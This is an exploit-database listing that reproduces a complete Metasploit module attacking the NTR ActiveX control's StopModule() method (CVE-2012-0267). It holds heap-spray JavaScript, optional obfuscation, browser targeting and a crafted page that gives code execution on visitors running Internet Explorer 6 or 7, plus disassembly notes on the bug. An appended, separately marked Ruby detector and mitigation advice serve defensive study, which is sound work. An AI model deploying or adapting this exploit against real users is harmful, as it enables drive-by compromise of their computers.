NTR ActiveX Control StopModule() Remote Code Execution

Published: 22 Sep 2012 00:00:00. Reported by: metasploit. Type: zdt. Source: 0day.today. Views: 25.

The NTR ActiveX Control StopModule() Remote Code Execution exploit abuses the control's StopModule() method to execute code when a victim visits a crafted web page.

Related

| Reporter | Title | Published | Family |
|---|---|---|---|
| Circl | CVE-2012-0267 | 10 Oct 2012 00:00 | circl |
| Check Point Advisories | NTR ActiveX Control StopModule() Remote Code Execution (CVE-2012-0267) | 20 Aug 2013 00:00 | checkpoint_advisories |
| CVE | CVE-2012-0267 | 15 Jan 2012 02:00 | cve |
| Cvelist | CVE-2012-0267 | 15 Jan 2012 02:00 | cvelist |
| Exploit DB | NTR - ActiveX Control 'StopModule()' Remote Code Execution (Metasploit) | 10 Oct 2012 00:00 | exploitdb |
| Metasploit | NTR ActiveX Control StopModule() Remote Code Execution | 20 Sep 2012 17:02 | metasploit |
| Tenable Nessus | NTR ActiveX Control < 2.0.4.8 Multiple Vulnerabilities | 16 Jan 2012 00:00 | nessus |
| NVD | CVE-2012-0267 | 15 Jan 2012 03:55 | nvd |
| Packet Storm | NTR ActiveX Control StopModule() Remote Code Execution | 22 Sep 2012 00:00 | packetstorm |
| Prion | Null pointer dereference | 15 Jan 2012 03:55 | prion |

Code

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::Remote::BrowserAutopwn

  autopwn_info({
    :ua_name    => HttpClients::IE,
    :ua_minver  => "6.0",
    :ua_maxver  => "7.0",
    :javascript => true,
    :os_name    => OperatingSystems::WINDOWS,
    :classid    => "{E6ACF817-0A85-4EBE-9F0A-096C6488CFEA}",
    :method     => "StopModule",
    :rank       => NormalRanking
  })


  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'NTR ActiveX Control StopModule() Remote Code Execution',
      'Description'    => %q{
          This module exploits a vulnerability found in the NTR ActiveX 1.1.8. The
        vulnerability exists in the StopModule() method, where the lModule parameter is
        used to dereference memory to get a function pointer, which leads to code execution
        under the context of the user visiting a malicious web page.
      },
      'Author'         =>
        [
          'Carsten Eiram', # Vulnerability discovery
          'juan vazquez' # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2012-0267' ],
          [ 'OSVDB', '78253' ],
          [ 'BID', '51374' ],
          [ 'URL', 'http://secunia.com/secunia_research/2012-2/' ]
        ],
      # The original module declared 'DefaultOptions' twice; in a Ruby hash the
      # second key silently replaces the first, dropping EXITFUNC. Merged here.
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
          'InitialAutoRunScript' => 'migrate -f'
        },
      'Payload'        =>
        {
          'Space' => 1024,
          'DisableNops' => true,
          'BadChars'    => ""
        },
      'Platform' => 'win',
      'Targets'        =>
        [
          # NTR ActiveX 1.1.8.0
          [ 'Automatic', {} ],
          [ 'IE 6 on Windows XP SP3', { 'Rop' => nil, 'Offset' => '0x5f4'} ],
          [ 'IE 7 on Windows XP SP3', { 'Rop' => nil, 'Offset' => '0x5f4'} ],
          [ 'IE 7 on Windows Vista',  { 'Rop' => nil, 'Offset' => '0x5f4'} ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Jan 11 2012',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
      ], self.class
    )

  end

  def get_spray(t, js_code, js_nops)

    spray = <<-JS
    var heap_obj = new heapLib.ie(0x20000);
    var code = unescape("#{js_code}");
    var nops = unescape("#{js_nops}");

    while (nops.length < 0x80000) nops += nops;

    var offset = nops.substring(0, #{t['Offset']});
    var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);

    while (shellcode.length < 0x40000) shellcode += shellcode;
    var block = shellcode.substring(0, (0x80000-6)/2);

    heap_obj.gc();
    for (var z=1; z < 500; z++) {
      heap_obj.alloc(block);
    }

    JS

    return spray

  end

  def get_target(agent)
    # If the target was already specified by the user, we'll just use that
    return target if target.name != 'Automatic'
    if agent =~ /NT 5\.1/ and agent =~ /MSIE 6/
      return targets[1] #IE 6 on Windows XP SP3
    elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7/
      return targets[2] #IE 7 on Windows XP SP3
    elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7/
      return targets[3] #IE 7 on Windows Vista SP2
    else
      return nil
    end
  end

  def on_request_uri(cli, request)

    agent = request.headers['User-Agent']
    print_status("User-agent: #{agent}")

    my_target = get_target(agent)

    # Avoid the attack if the victim doesn't have a setup we're targeting
    if my_target.nil?
      print_error("Browser not supported: #{agent}")
      send_not_found(cli)
      return
    end

    p = payload.encoded
    js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch))
    js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(my_target.arch))
    js = get_spray(my_target, js_code, js_nops)

    js = heaplib(js, {:noobfu => true})

    if datastore['OBFUSCATE']
      js = ::Rex::Exploitation::JSObfu.new(js)
      js.obfuscate
    end

    address = 0x0c0c0c0c / 0x134

    html = <<-MYHTML
    <html>
    <body>
    <object classid='clsid:E6ACF817-0A85-4EBE-9F0A-096C6488CFEA' id='test'></object>
    <script>
    #{js}
    test.StopModule(#{address});
    </script>
    </body>
    </html>
    MYHTML

    html = html.gsub(/^\t\t/, '')

    print_status("Sending html")
    send_response(cli, html, {'Content-Type'=>'text/html'})
  end
end

=begin

The pointer is "controlled" here:

.text:10004449                 mov     eax, [ebp+arg_0] ; arg_0 is user controlled
.text:1000444C                 imul    eax, 134h       ; it looks good
.text:10004452                 lea     esi, [eax+edi]  ; eax is user controlled
.text:10004452                                         ; edi is a heap pointer initialized while activex loading
.text:10004452                                         ;     (Important note: the default heap isn't being used)
.text:10004452                                         ;
.text:10004452                                         ; edi:
.text:10004452                                         ;
.text:10004452                                         ; 0:000> !heap -p -a edi
.text:10004452                                         ;     address 01fb370c found in
.text:10004452                                         ;     _HEAP @ 1fb0000
.text:10004452                                         ;       HEAP_ENTRY Size Prev Flags    UserPtr UserSize - state
.text:10004452                                         ;         01fb3668 0373 0000  [01]   01fb3670    01b90 - (busy)
.text:10004452                                         ;           ? ntractivex118!DllUnregisterServer+10d18
.text:10004452                                         ;
.text:10004452                                         ; Initialization (while activex loading):
.text:10004452                                         ; ChildEBP RetAddr  Args to Child
.text:10004452                                         ; 00138510 02a4e147 00001b84 02a4e8fb 00001b84 ntdll!RtlAllocateHeap+0xeac
.text:10004452                                         ; 00138548 02a4939e 00000000 7dc43038 00e057f8 ntractivex118!DllUnregisterServer+0x8823
.text:10004452                                         ; 0013855c 7dea5401 02093628 00000000 7dc43038 ntractivex118!DllUnregisterServer+0x3a7a
.text:10004452                                         ; 00138598 7deaa7f8 00e057f8 00e06154 80004005 mshtml!COleSite::InstantiateObjectFromCF+0x114

And used to get RCE here:

.text:1000446E                 mov     eax, [esi+24h]  ; esi can be user influenced
.text:10004471                 test    eax, eax
.text:10004473                 jz      short loc_10004477
.text:10004475                 call    eax             ; RCE!

=end
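As an added defensive example, not part of the Metasploit module or the 0day.today listing above: a Ruby content-inspection check, of the kind a web proxy, mail gateway or triage script could run, that flags HTML which instantiates the NTR control's CLSID and calls StopModule() either with an oversized index or alongside heap-spray markers. The CLSID, the method name, the heapLib/0x0c0c0c0c spray markers and the 0x134 multiplier come from the module and its analysis; the SUSPICIOUS_INDEX threshold, the regular-expression shapes and the two sample pages are constructed assumptions for this example.

```ruby
# Added example (not the module's own code): flag HTML that instantiates the
# NTR ActiveX control and invokes StopModule() in an exploit-like way.
# CLSID and method name are from the module above; thresholds, regex shapes
# and sample pages are constructed for this example.

NTR_CLSID = 'E6ACF817-0A85-4EBE-9F0A-096C6488CFEA'.freeze

# <object classid='clsid:...'> in either quote style, case-insensitive
OBJECT_RE = /<object\b[^>]*classid\s*=\s*["']?\s*clsid:#{Regexp.escape(NTR_CLSID)}\b/i
# <identifier>.StopModule(<argument>) with the raw argument captured
CALL_RE   = /\b([A-Za-z_$][\w$]*)\s*\.\s*StopModule\s*\(\s*([^)]*?)\s*\)/i
# Heap-spray hints the module emits: heapLib usage, the 0x0c0c0c0c landing
# value, and unescape("%u....") shellcode strings
SPRAY_RE  = /heapLib\.|0c0c0c0c|unescape\s*\(\s*["']%u/i

# Assumption: no legitimate module index is this large. The control computes
# heap_base + index * 0x134, so an index of this size points far outside any
# plausible module table (the module passes 0x0c0c0c0c / 0x134).
SUSPICIOUS_INDEX = 0x10000

# Parse a plain decimal or 0x-hex literal; nil for anything else
# (a variable name, an expression, an empty argument).
def parse_int(literal)
  case literal
  when /\A0x[0-9a-f]+\z/i then literal.to_i(16)
  when /\A\d+\z/          then literal.to_i
  end
end

# Returns a hash describing what was found and a verdict symbol.
def inspect_html(html)
  calls = html.scan(CALL_RE).map do |obj, arg|
    { object: obj, arg: arg, value: parse_int(arg) }
  end
  has_object = html.match?(OBJECT_RE)
  has_spray  = html.match?(SPRAY_RE)
  big_index  = calls.any? { |c| c[:value] && c[:value] >= SUSPICIOUS_INDEX }

  verdict = if has_object && (big_index || has_spray)
              :likely_exploit
            elsif has_object && !calls.empty?
              :review           # control present and method used, but nothing else
            else
              :clean
            end

  { ntr_object: has_object, calls: calls, heap_spray: has_spray, verdict: verdict }
end

# Constructed samples: one shaped like the page the module generates
# (656221 is 0x0c0c0c0c / 0x134 in decimal), one benign-looking use.
EXPLOIT_LIKE = <<~HTML
  <html><body>
  <object classid='clsid:E6ACF817-0A85-4EBE-9F0A-096C6488CFEA' id='test'></object>
  <script>
  var heap_obj = new heapLib.ie(0x20000);
  test.StopModule(656221);
  </script></body></html>
HTML

BENIGN = <<~HTML
  <html><body>
  <object classid='clsid:E6ACF817-0A85-4EBE-9F0A-096C6488CFEA' id='ntr'></object>
  <script>ntr.StopModule(1);</script>
  </body></html>
HTML

if __FILE__ == $0
  [EXPLOIT_LIKE, BENIGN].each { |page| p inspect_html(page) }
end
```

The literal regexes only see what the page ships in clear text: with the module's OBFUSCATE option enabled, the StopModule call and spray markers are hidden inside obfuscated JavaScript, so a check like this belongs behind a script-deobfuscation stage and is no substitute for removing the exposure itself (updating the control, which the Nessus entry above puts at versions below 2.0.4.8, or setting the kill bit for the CLSID so Internet Explorer refuses to instantiate it).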



#  0day.today [2018-04-04]  #

Published: 22 Sep 2012 00:00 (current). Vulners AI Score: 7.1 (High risk). EPSS: 0.73275. Views: 25.